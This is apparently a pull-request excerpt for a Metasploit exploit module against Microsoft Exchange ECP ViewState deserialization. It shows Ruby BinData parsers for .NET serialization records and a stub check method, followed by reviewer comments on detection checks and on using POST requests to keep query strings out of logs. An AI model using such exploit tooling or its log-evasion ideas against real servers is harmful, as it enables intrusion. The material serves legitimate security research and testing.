modules/exploits/windows/http/exchange_ecp_viewstate.rb

```diff
@@ -0,0 +1,365 @@
+    length_prefixed_string :name
+    int32                  :member_count, :value => lambda { member_names.length }
+    array                  :member_names, :type => :length_prefixed_string, :read_until => lambda { index == member_count - 1 }
+  end
+
+  class MemberTypeInfo < BinData::Record
+    # see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrbf/aa509b5a-620a-4592-a5d8-7e9613e0a03e
+    endian                 :little
+    array                  :binary_type_enums, :type => :uint8
+    #??? : member_type_info # this field is not supported, it's only used if binary_type_enums contains
+    # Primitive, SystemClass, Class, or PrimitiveArray
+    virtual                :valid, :assert => lambda {
+      (!binary_type_enums.include? BinaryTypeEnum[:Primitive]) \
+        && (!binary_type_enums.include? BinaryTypeEnum[:SystemClass]) \
+        && (!binary_type_enums.include? BinaryTypeEnum[:Class]) \
+        && (!binary_type_enums.include? BinaryTypeEnum[:PrimitiveArray])
+    }
+    virtual :assert => lambda { valid.assert! }
+  end
+
+  class ClassWithMembersAndTypes < BinData::Record
+    # see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrbf/847b0b6a-86af-4203-8ed0-f84345f845b9
+    endian                 :little
+    hide                   :record_type
+    uint8                  :record_type, :asserted_value => RecordTypeEnum[:ClassWithMembersAndTypes]
+    class_info             :class_info
+    member_type_info       :member_type_info
+    int32                  :library_id
+    virtual                :valid, :assert => lambda {
+      member_type_info.valid.assert!
+    }
+    virtual :assert => lambda { valid.assert! }
+  end
+
+  class SerializationHeaderRecord < BinData::Record
+    # see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrbf/a7e578d3-400a-4249-9424-7529d10d1b3c
+    endian                 :little
+    default_parameter      major_version: 1
+    default_parameter      minor_version: 0
+    hide                   :record_type
+    uint8                  :record_type, :asserted_value => RecordTypeEnum[:SerializedStreamHeader]
+    int32                  :header_id
+    int32                  :major_version, :initial_value => :major_version
+    int32                  :minor_version, :initial_value => :minor_version
+  end
+
+  class ObjectStateFormatter < BinData::Record
+    # see: https://github.com/microsoft/referencesource/blob/3b1eaf5203992df69de44c783a3eda37d3d4cd10/System.Web/UI/ObjectStateFormatter.cs
+    endian                 :little
+    default_parameter      marker_format: 0xff
+    default_parameter      marker_version: 1
+    hide                   :marker_format,  :marker_version
+    uint8                  :marker_format,  :initial_value => :marker_format
+    uint8                  :marker_version, :initial_value => :marker_version
+    uint8                  :token
+  end
+
+  def check
+    CheckCode::Unsupported
```

Comment:
Looks like there is a public checker here: https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/

Reply:
Yeah that PoC looks just like the one I based the module on. I'm still uncertain regarding remote checking feasibility though. That blog does have a list of vulnerable pages though that I should check to see if the POST method would be accepted. That would increase the usable size and potentially make detection more difficult by keeping the query strings out of the logs.

Reply:
The good news is I think we can reliably check for this vulnerability by obtaining the viewstate, signing it ourselves and comparing the signature. This should prove that we have the necessary information to generate valid, signed viewstates and can therefor leverage the vulnerability. I have a check method implementation done that's working on a true positive case and I'm updating my exchange server now to test on a true negative case.